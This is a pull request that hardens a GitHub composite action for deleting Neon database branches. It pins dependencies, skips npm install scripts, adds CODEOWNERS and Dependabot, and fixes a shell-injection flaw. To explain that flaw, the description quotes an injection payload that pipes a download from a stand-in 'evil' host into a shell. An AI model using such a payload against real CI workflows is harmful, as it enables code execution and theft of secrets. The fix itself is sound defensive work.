### PR TITLE
Supply-chain hardening for the composite action

### DIFF
--- a/.github/dependabot.yml
+++ b/.github/dependabot.yml
@@ -1,0 +1,13 @@
+version: 2
+updates:
+  - package-ecosystem: github-actions
+    directory: /
+    schedule:
+      interval: weekly
+      day: monday
+    groups:
+      actions-minor-patch:
+        update-types:
+          - minor
+          - patch
+    open-pull-requests-limit: 5

--- a/CODEOWNERS
+++ b/CODEOWNERS
@@ -1,0 +1,1 @@
+* @neondatabase/product-engineering-workflow

--- a/action.yaml
+++ b/action.yaml
@@ -25,7 +25,7 @@ runs:
   using: "composite"
   steps:
     - uses: actions/setup-node@v6
-    - run: npm i -g neonctl@v2
+    - run: npm i -g --ignore-scripts neonctl@2.22.0
       shell: bash
     - name: Delete branch
       shell: bash

--- a/action.yaml
+++ b/action.yaml
@@ -24,7 +24,7 @@ inputs:
 runs:
   using: "composite"
   steps:
-    - uses: actions/setup-node@v6
+    - uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e  # v6.4.0
     - run: npm i -g --ignore-scripts neonctl@2.22.0
       shell: bash
     - name: Delete branch

--- a/action.yaml
+++ b/action.yaml
@@ -32,9 +32,12 @@ runs:
       env:
         NEON_API_KEY: ${{ inputs.api_key }}
         NEON_API_HOST: ${{ inputs.api_host }}
+        INPUT_BRANCH: ${{ inputs.branch }}
+        INPUT_BRANCH_ID: ${{ inputs.branch_id }}
+        INPUT_PROJECT_ID: ${{ inputs.project_id }}
       run: |
-        if [ -z "${{ inputs.branch }}" ]; then
-          neonctl branches delete ${{ inputs.branch_id }} --project-id ${{ inputs.project_id }}
+        if [ -z "$INPUT_BRANCH" ]; then
+          neonctl branches delete "$INPUT_BRANCH_ID" --project-id "$INPUT_PROJECT_ID"
         else
-          neonctl branches delete "${{ inputs.branch }}" --project-id ${{ inputs.project_id }}
+          neonctl branches delete "$INPUT_BRANCH" --project-id "$INPUT_PROJECT_ID"
         fi


### PR DESCRIPTION
## Summary

Tightens the supply-chain posture of `action.yaml` and adds repo-level guardrails so future regressions are caught. No behavior change for legitimate inputs.

**What changed (5 commits, on top of `main` which now carries `actions/setup-node@v6`):**

1. **Pin `neonctl` to an exact version and skip install scripts.** Replace `npm i -g neonctl@v2` (mutable npm dist-tag) with `npm i -g --ignore-scripts neonctl@2.22.0`. Every consumer now installs the same audited build, and `--ignore-scripts` blocks the `preinstall`/`postinstall` family of npm supply-chain attacks (the event-stream / ua-parser-js class).

2. **Add `CODEOWNERS`** requiring review from `@neondatabase/product-engineering-workflow` on all changes.

3. **Add `.github/dependabot.yml`** for the `github-actions` ecosystem (weekly, minor+patch grouped, max 5 open PRs). Future SHA bumps get patched automatically.

4. **Fix a shell-injection footgun in the `Delete branch` step.** Route `inputs.branch`, `inputs.branch_id`, and `inputs.project_id` through the step's `env:` block and reference them as quoted bash variables (`"$INPUT_BRANCH"`, etc.). GitHub Actions substitutes `${{ inputs.* }}` expressions textually into the rendered shell script *before* bash parses it, so a downstream caller wiring an input from PR-controlled data (e.g. `branch: ${{ github.head_ref }}` for cleanup workflows) could be broken out of with a payload like `x";curl evil|sh;#`. Env-var routing puts the value in the process environment as data and bash quoting treats the whole value as a single argument.

5. **Pin `actions/setup-node` to a full-length commit SHA.** `@v6` is a mutable tag; pinning to `48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e` (`v6.4.0`, published 2026-04-20) makes the action immune to upstream tag mutation or maintainer compromise. Dependabot will bump this on future releases via the config added in (3).

## Test plan

- [ ] Manual smoke test: invoke this action from a test workflow with a real `branch` input and confirm the branch is deleted.
- [ ] Manual smoke test with `branch_id` (deprecated input) to confirm backward compatibility.
- [ ] Confirm the action.yaml YAML parses correctly (no CI exists yet to do this automatically — consider adding a minimal CI workflow in a follow-up).

## Notes for reviewers

- The shell-injection fix in commit 4 is the only behavior-affecting change, and only for malformed/malicious inputs — legitimate `branch`/`branch_id`/`project_id` values pass through identically.
